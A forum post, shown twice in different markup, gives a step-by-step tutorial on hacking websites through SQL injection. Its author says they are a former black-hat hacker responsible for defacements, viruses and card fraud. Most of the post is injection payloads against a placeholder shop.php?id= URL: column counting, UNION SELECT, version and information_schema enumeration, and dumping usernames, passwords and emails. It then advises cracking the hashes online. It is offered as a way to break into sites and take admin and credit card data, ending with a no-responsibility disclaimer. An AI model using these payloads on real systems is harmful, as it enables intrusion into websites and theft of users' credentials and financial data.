Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
Ad icon
Wechat qr verification
Pawan2005
Updated:
Today at 1:28 AM
🚀 GOOGLE AI PRO 18 MONTHS ACTIVATION 🚀
sayuru bandara
Updated:
Yesterday at 5:34 PM
Pure VPN - Up to 27 Months
vgp
Updated:
Friday at 8:10 AM
එක පැකේජ් එකයි මාසෙටම Unlimited Internet. තාමත් DATA CARD දාන්න සල්ලි වියදම් කරනවද? අඩුම මිලට අපෙන්.
sayuru bandara
Updated:
Jun 2, 2026
Ad icon
ඉන්ටර්නෙට් එකෙන් හරියටම සල්ලි හොයන්න සහ Success වෙන්න කැමතිද? 🚀 (E-Money & Success Stories)
siri sumana
Updated:
May 30, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
Computers & Internet
Tips & Tricks
WebSite Hacking Full [Tut]
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Message
<blockquote data-quote="Ethical_World" data-source="post: 4232572" data-attributes="member: 183013"><p>Well 1st I will Introduce my Self .. Im was a Black Hat Hacker for 3 years </p><p>.. I did </p><p>1 . About 150 site Defaced </p><p>2 . 5 major Virus </p><p>3 . morethan 200 computers BOxed </p><p>4 . Many Many Credit Card Farwds </p><p></p><p> , and did many things so I cant revile my really Identity But Now Im a White Hat Hacker .. an Ethical Hacker if u wana call .</p><p></p><p><strong>So this Tut is wrote by own Hand Didn't copy it from anywhere </strong></p><p><strong>Coz Elakiri Deserv The Best</strong></p><p><strong></strong></p><p>There are cople ways to Hack Into a Website </p><p></p><p><span style="font-size: 18px">1. Sql injection</span></p><p><span style="font-size: 18px">2. RFI </span></p><p><span style="font-size: 18px">3. LFI </span></p><p><span style="font-size: 18px">4. Xss </span></p><p><span style="font-size: 18px">5. Otherways </span></p><p></p><p><span style="font-size: 15px">we</span><span style="font-size: 15px">ll in Sql Injection is the most famous thing so I will teach you about SQL with Pic !</span></p><p><span style="font-size: 15px"></span></p><p><span style="font-size: 15px"></span><p style="text-align: center"><u><span style="font-size: 18px"><span style="color: DarkRed">Sql Injection</span></span></u></p> <p style="text-align: center"></p><p> <u><span style="font-size: 18px"><span style="color: Red"><span style="font-size: 15px"></span></span></span></u></p><p><u><span style="font-size: 18px"><span style="color: Red"><span style="font-size: 15px">What is SQL Injection?</span></span></span></u></p><p><u><span style="font-size: 18px"><span style="color: Red"><span style="font-size: 15px"></span></span></span></u></p><p><u><span style="font-size: 18px"><span style="color: Red"><span style="font-size: 15px"></span></span></span></u><span style="font-size: 10px"><span style="color: Red"><span style="color: Black">SQL Injection is something like. In the very simple way when you inject a Site you can get</span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black">Admin User Name (Root)</span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black">Admin password (Root)</span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black">Other admins pass </span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black">Every User Name</span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black">Every User Pass</span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black">Cridit Card Info ( Every Detail )</span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><u><span style="font-size: 15px"><span style="color: Red">How you Find a Site Venurable or not</span></span></u></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><u><span style="font-size: 15px"><span style="color: Red"></span></span></u></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><u><span style="font-size: 15px"><span style="color: Red"></span></span></u><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 12px"><span style="font-size: 10px">Lets Say I have a Site </span></span></span></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 12px"><span style="font-size: 10px"></span></span></span></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 12px"><span style="font-size: 10px"></span></span></span></span></span></span></span></span>[code][URL="http://www.website.com/shop.php?id=10"]http://www.website.com/shop.php?id=10[/URL][/code]<span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 10px">to see it HackAble or not Put ' in the End </span></span></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 10px">So it Shoud look like </span></span></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 10px"></span></span></span></span></span></span></span>[code][URL="http://www.website.com/shop.php?id=10"]http://www.website.com/shop.php?id=10'[/URL][/code]<span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"></span></span></span></span></span>And If it Give you a MYSQL Error ..That mean the Site is Hack Able</p><p><img src="http://img519.imageshack.us/img519/7947/1sqlerror.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p>Ok Next Step is </p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><u><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"></span></span></span></u></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><u><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"></span></span></span></u><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 10px">so Now We Know the Site is Venul or not . </span></span></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 10px">Now We Have get trought This to Hack into admin</span></span></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 10px"></span></span></span></span></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"><span style="font-size: 10px"></span></span></span></span></span></span></span><span style="color: Black">1. Finding the number of columns</span></p><p><span style="color: Black">2. Check if UNION works.</span></p><p><span style="color: Black">3. Looking for a visible column </span></p><p><span style="color: Black">3. Check if the version is > 5</span></p><p><span style="color: Black">4. Extracting table names, column names, etc... (Or bruteforcing if the version is < 5)</span></p><p><span style="color: Black">5. Forming the finishing query to extract our required information.</span></p><p></p><p><u><span style="font-size: 12px"><span style="color: Black">Finding the number of columns</span></span></u></p><p></p><p>[code][URL="http://www.website.com/shop.php?id=10+order+by+1--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+1--"].com/shop.php?id=10+order+by+1--[/URL] [/code] (You shoul not get any error)</p><p>[code][URL="http://www.website.com/shop.php?id=10+order+by+10000--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+10000--"].com/shop.php?id=10+order+by+10000--[/URL] [/code] (You should get an error)</p><p></p><p>If u get a Error The Next Step is to Get the number of columns </p><p></p><p>[code][URL="http://www.website.com/shop.php?id=10+order+by+2--"]http://www.Site.com/shop.php?id=10+order+by+2--[/URL]</p><p>[URL="http://www.website.com/shop.php?id=10+order+by+3--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+3--"].com/shop.php?id=10+order+by+3--[/URL]</p><p>[URL="http://www.website.com/shop.php?id=10+order+by+4--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+4--"].com/shop.php?id=10+order+by+4--[/URL]</p><p>[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+5--[/URL] </p><p>[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+6--[/URL]</p><p>[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+7--[/URL][/code]<--- Keep Injecting until you get an error,</p><p>for me it's when order by 7 in my Pic</p><p><img src="http://img237.imageshack.us/img237/6467/cloms.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p><u><span style="font-size: 15px"><span style="color: Black">Check if UNION works.</span></span></u></p><p></p><p>So Now we Know Our site has <strong>6 columns</strong> so What u sould do now is </p><p>Put it in a order like </p><p></p><p>[code][URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,2,3,4,5,6--[/code] </p><p><u><span style="font-size: 15px"><span style="color: Black">Looking for a visible column </span></span></u></p><p></p><p>Now you should get a see a Number in the screen Some were For me its</p><p><strong>2</strong> ( Its highlighted ) </p><p></p><p><img src="http://img142.imageshack.us/img142/46/3numbers.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><u><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"></span></span></span></u></span></span></span></p><p><span style="font-size: 10px"><span style="color: Red"><span style="color: Black"><u><span style="font-size: 15px"><span style="color: Red"><span style="color: Black"></span></span></span></u></span></span></span><span style="color: Black"> <u><span style="font-size: 15px">Check if the version is > 5</span></u></span></p><p></p><p>Now We need to check if the version is > 5 (<strong>VERY VERY IMPORTANT STEP</strong>)</p><p>For This , I pick our visible column...in this case it is 2...and we must replace it with "@@version"</p><p></p><p>For Ex : </p><p>[code]</p><p>[URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,@@version,3,4,5,6--[/code] </p><p>Now you will Able to see the MYSQL Ver Like this</p><p><img src="http://img15.imageshack.us/img15/7214/4version.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p><strong>You should FIRST CHECK IF IT IS GREATER THAN 5, now..</strong></p><p><strong>If it is, you can proceed or you HAVE TO GUESS THE TABLE NAMES IF ITS BELOW version 5.</strong></p><p><span style="color: Black"> <u><span style="font-size: 15px">Extracting table names, column names, etc...</span></u></span></p><p><span style="color: Black"><u><span style="font-size: 15px"></span></u><span style="font-size: 15px"><span style="font-size: 10px"></span></span></span></p><p><span style="color: Black"><span style="font-size: 15px"><span style="font-size: 10px">now we must Get </span></span></span></p><p><span style="color: Black"><span style="font-size: 15px"><span style="font-size: 10px"></span></span></span>1. Database names</p><p>2. Table names</p><p>3. Column names</p><p></p><p><u>DataBase Names :</u></p><p><u></u></p><p><u></u>Now This is the Confusing PartSo Stay with me </p><p></p><p>Now we are gona get the Database Name and user all together since we know the visible column</p><p></p><p>[code][URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6--[/code] </p><p>Many peple get confuse with <strong>"concat_ws"</strong>It actually means concat with separator and the separator we use should be given in the starting of the syntax.Here I used 0x3a whose equivalent is “:” . The main purpose of using this is getting the output in desired format as we need it to be.(copied)</p><p></p><p><u>Now lets see what Are this </u></p><p><strong>Version() :—</strong> Version()is use to inject version of the MySql used in the server</p><p><strong>User()</strong> <strong>:-</strong> This will Inject registered MySql user in the database.</p><p><strong>Database ()</strong> <strong>:-</strong> is the DataBase Name </p><p>Now That will Give you somthing like This </p><p><img src="http://img519.imageshack.us/img519/9126/5sigma.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p></p><p><u>Grab the Database using Information_schema</u></p><p></p><p>[code][URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.website.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(schema_name),3,4,5,6 +from+information_schema.schemata—[/code] <strong><u>What is This</u> </strong></p><p>1. <strong>+from+information_schema.schemata :- </strong>returns the databases on the server</p><p>We may get the database name depending on the no of databases present.</p><p>Like If you get something like this </p><p><img src="http://img148.imageshack.us/img148/1087/6database.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p><strong>Sigma</strong> is the DataBase Name</p><p></p><p><em><u>Extracting table names:</u></em></p><p><em><u></u></em>Now we know the DataBase Name What we need now is <strong>MySql Table Names</strong> </p><p>I've picked the database 'users' to extract our table names.</p><p>we have to use the database information_schema and the table tables and the column table_name to extract the respective table names.</p><p>So It Should be like </p><p>[code][URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.Site.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(table_name),3,4 ,5,6+from+information_schema.tables—[/code] This is give you more than we need .. Like Every Junkin DB.</p><p></p><p>So We Only need tables for the table users. So Now we go up with </p><p>[code][URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.Site.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='users'—[/code] If it didnt respose you properly Some Times you have Hex the "Users" when "Users"Hex it get "0x7573657273"</p><p>So it sould be like </p><p><a href="http://www.website.com/shop.php?id=1+UNION+SELECT+1" target="_blank">http://www.Site.com/shop.php?id=1+UNION+SELECT+1</a>, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='0x7573657273'—</p><p>Now you sould get a Table Name I'll take the table USERS for example.</p><p></p><p><strong><em> column names:</em></strong></p><p>Now we gona get the Data from the table named “USERS” and we extract various columns from it.</p><p>[code][URL="http://www.website.com/shop.php?id=10+UNION+SELECT+1,group_concat%28column_name"]www.Site.com/shop.php?id=10+UNION+SE ... olumn_name[/URL]),3,4,5,6+from+information_schema.columns+where+table_name='USERS'--[/code] In that I have change group_concat(table_name) to group_concat(column_name) becourse now we are looking for columns .</p><p>column_name extracts all column names present in the table.</p><p>And add this to the end of the columns </p><p><strong>+from+information_schema.columns+where+table_name='USERS'—</strong></p><p>it will show you the columns lets think table are username,password and email.</p><p>[code]http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email) ,3,4+from+USERS—[/code] </p><p>Now you are done .. anyways I only needed Admin User Name so i did it in a another way</p><p><img src="http://img99.imageshack.us/img99/6351/donee.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p><p>If it comes with a number you need to Crack it .. you can use a Online MD5 </p><p>cracker for that </p><p></p><p></p><p></p><p>This is Only for Knowledge .. Im not responsible for what you do with Knowledge</p></blockquote><p></p>
[QUOTE="Ethical_World, post: 4232572, member: 183013"] Well 1st I will Introduce my Self .. Im was a Black Hat Hacker for 3 years .. I did 1 . About 150 site Defaced 2 . 5 major Virus 3 . morethan 200 computers BOxed 4 . Many Many Credit Card Farwds , and did many things so I cant revile my really Identity But Now Im a White Hat Hacker .. an Ethical Hacker if u wana call . [B]So this Tut is wrote by own Hand Didn't copy it from anywhere [/B] [B]Coz Elakiri Deserv The Best [/B] There are cople ways to Hack Into a Website [SIZE=5]1. Sql injection 2. RFI 3. LFI 4. Xss 5. Otherways [/SIZE] [SIZE=4]we[/SIZE][SIZE=4]ll in Sql Injection is the most famous thing so I will teach you about SQL with Pic ![/SIZE] [SIZE=4] [/SIZE][CENTER][U][SIZE=5][COLOR=DarkRed]Sql Injection[/COLOR][/SIZE][/U] [/CENTER] [U][SIZE=5][COLOR=Red][SIZE=4] What is SQL Injection? [/SIZE][/COLOR][/SIZE][/U][SIZE=2][COLOR=Red][COLOR=Black]SQL Injection is something like. In the very simple way when you inject a Site you can get Admin User Name (Root) Admin password (Root) Other admins pass Every User Name Every User Pass Cridit Card Info ( Every Detail ) [U][SIZE=4][COLOR=Red]How you Find a Site Venurable or not [/COLOR][/SIZE][/U][SIZE=4][COLOR=Red][COLOR=Black][SIZE=3][SIZE=2]Lets Say I have a Site [/SIZE][/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][code][URL="http://www.website.com/shop.php?id=10"]http://www.website.com/shop.php?id=10[/URL][/code][SIZE=2][COLOR=Red][COLOR=Black][SIZE=4][COLOR=Red] [COLOR=Black][SIZE=2]to see it HackAble or not Put ' in the End So it Shoud look like [/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][code][URL="http://www.website.com/shop.php?id=10"]http://www.website.com/shop.php?id=10'[/URL][/code][SIZE=2][COLOR=Red][COLOR=Black][SIZE=4][COLOR=Red] [/COLOR][/SIZE][/COLOR][/COLOR][/SIZE]And If it Give you a MYSQL Error ..That mean the Site is Hack Able [IMG]http://img519.imageshack.us/img519/7947/1sqlerror.png[/IMG] Ok Next Step is [SIZE=2][COLOR=Red][COLOR=Black][U][SIZE=4][COLOR=Red][COLOR=Black] [/COLOR][/COLOR][/SIZE][/U][SIZE=4][COLOR=Red][COLOR=Black][SIZE=2]so Now We Know the Site is Venul or not . Now We Have get trought This to Hack into admin [/SIZE][/COLOR][/COLOR][/SIZE][/COLOR][/COLOR][/SIZE][COLOR=Black]1. Finding the number of columns 2. Check if UNION works. 3. Looking for a visible column 3. Check if the version is > 5 4. Extracting table names, column names, etc... (Or bruteforcing if the version is < 5) 5. Forming the finishing query to extract our required information.[/COLOR] [U][SIZE=3][COLOR=Black]Finding the number of columns[/COLOR][/SIZE][/U] [code][URL="http://www.website.com/shop.php?id=10+order+by+1--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+1--"].com/shop.php?id=10+order+by+1--[/URL] [/code] (You shoul not get any error) [code][URL="http://www.website.com/shop.php?id=10+order+by+10000--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+10000--"].com/shop.php?id=10+order+by+10000--[/URL] [/code] (You should get an error) If u get a Error The Next Step is to Get the number of columns [code][URL="http://www.website.com/shop.php?id=10+order+by+2--"]http://www.Site.com/shop.php?id=10+order+by+2--[/URL] [URL="http://www.website.com/shop.php?id=10+order+by+3--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+3--"].com/shop.php?id=10+order+by+3--[/URL] [URL="http://www.website.com/shop.php?id=10+order+by+4--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+4--"].com/shop.php?id=10+order+by+4--[/URL] [URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+5--[/URL] [URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+6--[/URL] [URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=10+order+by+7--[/URL][/code]<--- Keep Injecting until you get an error, for me it's when order by 7 in my Pic [IMG]http://img237.imageshack.us/img237/6467/cloms.png[/IMG] [U][SIZE=4][COLOR=Black]Check if UNION works.[/COLOR][/SIZE][/U] So Now we Know Our site has [B]6 columns[/B] so What u sould do now is Put it in a order like [code][URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,2,3,4,5,6--[/code] [U][SIZE=4][COLOR=Black]Looking for a visible column [/COLOR][/SIZE][/U] Now you should get a see a Number in the screen Some were For me its [B]2[/B] ( Its highlighted ) [IMG]http://img142.imageshack.us/img142/46/3numbers.png[/IMG][SIZE=2][COLOR=Red][COLOR=Black][U][SIZE=4][COLOR=Red][COLOR=Black] [/COLOR][/COLOR][/SIZE][/U][/COLOR][/COLOR][/SIZE][COLOR=Black] [U][SIZE=4]Check if the version is > 5[/SIZE][/U][/COLOR] Now We need to check if the version is > 5 ([B]VERY VERY IMPORTANT STEP[/B]) For This , I pick our visible column...in this case it is 2...and we must replace it with "@@version" For Ex : [code] [URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,@@version,3,4,5,6--[/code] Now you will Able to see the MYSQL Ver Like this [IMG]http://img15.imageshack.us/img15/7214/4version.png[/IMG] [B]You should FIRST CHECK IF IT IS GREATER THAN 5, now..[/B] [B]If it is, you can proceed or you HAVE TO GUESS THE TABLE NAMES IF ITS BELOW version 5.[/B] [COLOR=Black] [U][SIZE=4]Extracting table names, column names, etc... [/SIZE][/U][SIZE=4][SIZE=2] now we must Get [/SIZE][/SIZE][/COLOR]1. Database names 2. Table names 3. Column names [U]DataBase Names : [/U]Now This is the Confusing PartSo Stay with me Now we are gona get the Database Name and user all together since we know the visible column [code][URL="http://www.website.com/shop.php?id=10+order+by+5--"]http://www.[/URL][URL="http://www.website.com/shop.php?id=10+order+by+2--"]Site[/URL][URL="http://www.website.com/shop.php?id=10+order+by+5--"].com/shop.php?id=-10[/URL]+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6--[/code] Many peple get confuse with [B]"concat_ws"[/B]It actually means concat with separator and the separator we use should be given in the starting of the syntax.Here I used 0x3a whose equivalent is “:” . The main purpose of using this is getting the output in desired format as we need it to be.(copied) [U]Now lets see what Are this [/U] [B]Version() :—[/B] Version()is use to inject version of the MySql used in the server [B]User()[/B] [B]:-[/B] This will Inject registered MySql user in the database. [B]Database ()[/B] [B]:-[/B] is the DataBase Name Now That will Give you somthing like This [IMG]http://img519.imageshack.us/img519/9126/5sigma.png[/IMG] [U]Grab the Database using Information_schema[/U] [code][URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.website.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(schema_name),3,4,5,6 +from+information_schema.schemata—[/code] [B][U]What is This[/U] [/B] 1. [B]+from+information_schema.schemata :- [/B]returns the databases on the server We may get the database name depending on the no of databases present. Like If you get something like this [IMG]http://img148.imageshack.us/img148/1087/6database.png[/IMG] [B]Sigma[/B] is the DataBase Name [I][U]Extracting table names: [/U][/I]Now we know the DataBase Name What we need now is [B]MySql Table Names[/B] I've picked the database 'users' to extract our table names. we have to use the database information_schema and the table tables and the column table_name to extract the respective table names. So It Should be like [code][URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.Site.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(table_name),3,4 ,5,6+from+information_schema.tables—[/code] This is give you more than we need .. Like Every Junkin DB. So We Only need tables for the table users. So Now we go up with [code][URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.Site.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='users'—[/code] If it didnt respose you properly Some Times you have Hex the "Users" when "Users"Hex it get "0x7573657273" So it sould be like [URL="http://www.website.com/shop.php?id=1+UNION+SELECT+1"]http://www.Site.com/shop.php?id=1+UNION+SELECT+1[/URL], group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='0x7573657273'— Now you sould get a Table Name I'll take the table USERS for example. [B][I] column names:[/I][/B] Now we gona get the Data from the table named “USERS” and we extract various columns from it. [code][URL="http://www.website.com/shop.php?id=10+UNION+SELECT+1,group_concat%28column_name"]www.Site.com/shop.php?id=10+UNION+SE ... olumn_name[/URL]),3,4,5,6+from+information_schema.columns+where+table_name='USERS'--[/code] In that I have change group_concat(table_name) to group_concat(column_name) becourse now we are looking for columns . column_name extracts all column names present in the table. And add this to the end of the columns [B]+from+information_schema.columns+where+table_name='USERS'—[/B] it will show you the columns lets think table are username,password and email. [code]http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email) ,3,4+from+USERS—[/code] Now you are done .. anyways I only needed Admin User Name so i did it in a another way [IMG]http://img99.imageshack.us/img99/6351/donee.png[/IMG] If it comes with a number you need to Crack it .. you can use a Online MD5 cracker for that This is Only for Knowledge .. Im not responsible for what you do with Knowledge [/QUOTE]
Insert quotes…
Verification
Dawasata paya keeyak thibeda?
Post reply
Top
Bottom
🚀 GOOGLE AI PRO 18 MONTHS ACTIVATION 🚀
Pure VPN - Up to 27 Months
